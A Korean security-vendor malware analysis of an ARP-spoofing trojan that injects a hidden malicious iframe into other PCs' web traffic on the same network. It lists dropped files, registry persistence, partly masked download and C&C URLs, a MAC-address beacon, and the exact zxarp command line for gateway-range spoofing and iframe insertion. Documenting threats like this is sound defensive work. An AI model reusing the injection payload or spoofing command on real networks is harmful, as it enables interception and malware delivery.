ARP Spoofing 유발 악성코드

 

 최근 인터넷 사용시 어떠한 사이트를 접속을 해도 ActiveX 보안 경고가 발생한다는 피해가 보고되었다. 이는 ARP Spoofing을 유발하는 악성코드에 감염된 시스템으로 인해 동일 네트워크상의 정상 PC에서 인터넷 사용시 악성코드 유포 URL이 iframe으로 삽입되어 발생한 증상으로 확인되었다.

 

아래 [그림 1]은 ARP Spoofing이 감염된 시스템이 있는 동일 네트워크상의 정상 PC에서 악성코드 유포사이트가 아닌 정상 사이트인 www.ahnlab.com 사이트를 접속을 할 경우 ActiveX 보안 경고가 나타난 화면이다. 이때 신뢰할 수 있는 사이트라고 해서 무의식적으로 ActiveX 컨트롤러를 설치하면 이 악성코드에 감염될 수 있으니 주의가 필요하다.

 

[그림 1] 정상 사이트 접속 시 삽입된 iframe으로 ActiveX 보안 경고가 나타나는 화면

 

 

ARP Spoofing을 유발하는 PC에 대해서 악성코드를 치료 하지 않은 상태에서는 동일 네트워크상의 다른 정상 PC에서 인터넷을 사용할 때 마다 ActiveX 보안 경고가 나타나기 때문에 PC 사용에 불편을 야기하고, 네트워크로 확산되는 이러한 악성코드가 다수의 PC에 감염된 상태라면 네트워크 장애로 이어질 수 있다.

 

내부 네트워크에서 이러한 증상이 발생한다면 ARP Spoofing을 유발하는 악성코드에 감염된 PC를 찾아 조치가 필요하다.

 

ARP Spoofing을 유발하는 악성코드에 감염된 PC를 찾는 방법은 아래 ASEC 블로그 내용을 참고한다.

패킷을 훔치는 ARP Spoofing 공격 탐지 툴 (1)

패킷을 훔치는 ARP Spoofing 공격 탐지 툴 (2)

 

ARP Soofing 탐지 툴 이외에도 ActiveX 보안 경고가 발생한 시스템에서 arp -a 명령을 이용하여 ARP Spoofing을 유발하는 IP를 찾을 수 있다. 아래 [그림 2]에서 실제 게이트웨이 IP는 192.168.95.2이다. 그런데 게이트웨이 IP에 해당되는 MAC 주소가 192.168.95.129와 동일한 것을 확인할 수 있는데, 게이트웨이 MAC 주소와 동일한 MAC 주소를 가진 192.168.95.129 IP가 ARP Spoofing을 유발하는 IP라는 것을 알 수 있다.

 

[그림 2] arp -a 명령을 이용한 탐지 방법

 

 

삽입된 iframe 코드는 다음과 같으며, win7.html 소스를 확인해 보면 [그림 3]과 같이 인코딩 된 것을 알 수 있다.

<iframe src="http://nave**.**-**s.com/win7.html" width=0 height=0 frameborder=0></iframe>

 

 

디코딩 하면 악성코드를 다운받아 설치하는 정상 ActiveX 컨트롤러 정보와 악성코드 유포 URL을 확인할 수 있다.

 

 

ActiveX 컨트롤러를 설치할 경우 win8.exe 파일을 다운로드 받아 실행하고, win8.exe 파일은 아래와 같은 파일 생성과 시스템 시작 시 자동으로 실행되도록 레지스트리에 등록한다.

 

[파일 생성]

%Temp%\127.exe

%UserProfile%\Local Settings\Temporary Internet Files\win7[1].exe

%Temp%\fbA6b6A266.exe

%Systemroot%\System32\System32.exe

%UserProfile%\Local Settings\Temporary Internet Files\arpx[1].exe

%Temp%\1TbTDtPeT4.exe

%Systemroot%\npptools.dll

%Systemroot%\wpcap.dll

%Systemroot%\WanPacket.dll

%Systemroot%\Packet.dll    

%Systemroot%\system32\drivers\7.tmp

%Temp%\8.tmp

 

[레지스트리 등록]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

@="%Systemroot%\system32\System32.exe"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\System32 System

"ImagePath"="%Systemroot%\system32\System32.exe"

 

[그림 3] win8.exe 파일 구성도

 

 

win8.exe 파일에 의해 생성된 127.exe 파일은 아래 경로와 같이 win7.exe 파일과 arpx.exe 파일을 다운로드 받아 실행하고, 감염된 PC의 MAC 주소를 특정 서버로 전송한다.

 

hxxp://nave**.**-**s.com/win7.exe

hxxp://nave**.**-**s.com/arpx.exe

hxxp://nave**.**-**s.com/winx/count.asp?mac=00-0c-29-34-bb-73&ver=arp1

 

win7.exe 파일은 fbA6b6A266.exe 및 system32.exe 파일과 동일한 파일이고, system32.exe 파일을 윈도우 시스템 폴더에 복사를 하고 시작프로그램과 서비스에 등록한다.

 

system32.exe 파일은 C&C 서버로 추정되는 아래 IP로 매 4초마다 접속을 시도하지만 분석당 시 정상 연결은 되지 않았다.

 

C&C 서버 IP : nave**.**-**s.com:1963 (21*.*15.*6.*5:1963)

 

arpx.exe 파일은 1TbTDtPeT4.exe 파일과 동일한 파일로, ARP Spoofing을 위해 정상 Winpcap 모듈과 zxarp로 알려진 중국어로 제작된 8.tmp 파일이 설치되고 실행된다.

 

8.tmp 파일이 ARP Spoofing을 유발하고 동일한 네트워크상의 정상 PC에서 인터넷 사용시 악성코드 유포 URL을 iframe 코드로 삽입하는 동작을 한다.

 

[그림 4] 8.tmp 명령 옵션

 

 

8.tmp 파일이 아래와 같은 옵션으로 실행되면서 ARP Spoofing과 iframe 코드 삽입을 한다.

 

-idx 0 -ip 192.168.95.2-192.168.95.254 -port 80 -insert "<iframe src="http://nave**.**-**s.com/win7.html" width=0 height=0 frameborder=0></iframe>"        

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

 

<V3 제품군의 진단명>

 

Trojan/Win32.Warp 등.